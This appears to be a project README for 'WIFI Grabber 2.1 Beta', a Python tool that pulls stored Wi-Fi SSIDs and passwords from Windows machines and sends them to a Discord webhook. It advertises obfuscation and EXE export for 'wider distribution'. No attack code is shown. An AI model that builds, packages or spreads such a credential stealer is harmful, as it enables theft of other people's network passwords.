π§ **This project is currently under development. Stay tuned for updates!** π§
WIFI Grabber 2.1 Beta is a Python script designed to extract SSIDs and passwords from the wireless interfaces of a machine and securely send the data to a Discord webhook.
If the device lacks a WiFi interface, the script will not function β.
Note: This script is compatible only with Windows 10/11 πͺ.
- Modernized UI: Enhanced with a sleek, intuitive design.
- EXE Export: Convert the script into a standalone executable for wider distribution.
- Obfuscation: Secure your script with built-in obfuscation options.
- Flexible Information Retrieval:
- Grab complete wireless interface details.
- Retrieve SSIDs and passwords only.
- Multilingual Support:
- Added support for Arabic and English, toggleable in the settings.
Note: To use the Arabic version, ensure your keyboard is set to English while interacting with the Tkinter UI. Tkinter has limited Arabic text rendering capabilities.
- β This script is specifically designed for Windows platforms.
- π‘οΈ Always use responsibly and adhere to all applicable laws.
Check out the demonstration video here:
To use this project, you'll need to install the required Python packages listed in requirements.txt
. Follow these steps:
- Ensure Python is installed on your machine.
- Open a terminal or command prompt.
- Navigate to the project directory.
- Run the following command:
pip install -r requirements.txt
By downloading this, you agree to the Commons Clause license and that you're not allowed to sell this repository or any code from this repository. For more info see https://commonsclause.com/.